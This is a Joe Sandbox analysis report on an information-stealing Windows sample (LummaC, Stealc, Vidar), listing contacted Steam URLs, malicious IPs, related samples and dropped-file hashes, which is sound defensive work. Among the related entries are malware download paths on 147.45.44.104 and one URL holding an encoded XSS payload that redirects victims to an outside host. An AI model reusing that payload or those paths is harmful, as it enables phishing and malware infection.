                                                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://crl.entrust.net/2048ca.crl0file.exefalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://store.steampowered.com/;aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.entrust.net/rpa0file.exefalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://ocsp.entrust.net03file.exefalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://ocsp.entrust.net02file.exefalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                      unknown
                                                                      https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.197.9 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
147.45.44.104 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524652
Start date and time: 2024-10-03 03:25:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/26@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 96
• Number of non-executed functions: 161
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:26:49 | API Interceptor | 1x Sleep call for process: aspnet_regiis.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  49.12.197.966fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                      147.45.44.104nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                      • 147.45.44.104/revada/66fa80c468fe3_Channel2.exe
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      steamcommunity.comtcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 104.102.49.254
                                                                                                      Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                      • 104.102.49.254
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      EKAHephXb2.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                      • 104.102.49.254
                                                                                                      webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      FREE-NET-ASFREEnetEUnJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                      • 147.45.60.44
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      AKAMAI-ASUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 23.217.172.185
                                                                                                      cleu.cmDGet hashmaliciousUnknownBrowse
                                                                                                      • 23.47.168.24
                                                                                                      kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                      • 92.122.18.57
                                                                                                      Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                                                                      • 2.19.224.93
                                                                                                      tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 104.102.49.254
                                                                                                      deveba=.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 173.223.116.167
                                                                                                      Proposal From Transom.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                      • 23.203.104.175
                                                                                                      Payout_receipt.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 96.17.64.189
                                                                                                      Visix Digital Signage.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 23.203.104.175
                                                                                                      novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 184.28.163.53
                                                                                                      HETZNER-ASDEMZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                      • 195.201.57.90
                                                                                                      N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                      • 5.161.250.225
                                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 197.242.86.248
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 197.242.86.252
                                                                                                      novo.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 5.75.175.36
                                                                                                      novo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 116.203.33.160
                                                                                                      yakov.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 78.47.94.116
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 51c64c77e60f3980eea90869b68c58a8 | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 49.12.197.9 |
| 37f463bf4616ecd445d4a1937da06e19 | MZs41xJfcH.exe | malicious | PureLog Stealer, Quasar, zgRAT | 104.102.49.254 |
| | C5Nbn7P6GJ.exe | malicious | XRed, XWorm | 104.102.49.254 |
| | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.102.49.254 |
| | file.exe | malicious | LummaC, Stealc, Vidar | 104.102.49.254 |
| | lFsYXvJPWw.exe | malicious | XRed | 104.102.49.254 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.102.49.254 |
| | 563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown | 104.102.49.254 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.102.49.254 |
| | PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 104.102.49.254 |
| | AMG Cargo Logistic.docx | malicious | Unknown | 104.102.49.254 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar | |
| | file.exe | malicious | Stealc, Vidar | |
| | nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine | |
| | file.exe | malicious | Stealc, Vidar | |
| | file.exe | malicious | Stealc, Vidar | |
| | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | |
| | file.exe | malicious | LummaC, Stealc, Vidar | |
| | file.exe | malicious | Stealc, Vidar | |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | |
| | file.exe | malicious | Stealc, Vidar | |
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):13
                                                                                                                          Entropy (8bit):2.8150724101159437
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:+MEM:+BM
                                                                                                                          MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                          SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                          SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                          SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:Unknown error
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5242880
                                                                                                                          Entropy (8bit):0.03786218306281921
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                                          MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                                          SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                                          SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                                          SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):159744
                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.137181696973627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                          MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                          SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                          SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                          SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.848598812124929
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                          MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.1215420383712111
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9370
                                                                                                                          Entropy (8bit):5.514140640374404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                          MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                          SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                          SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                          SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                          Malicious:false
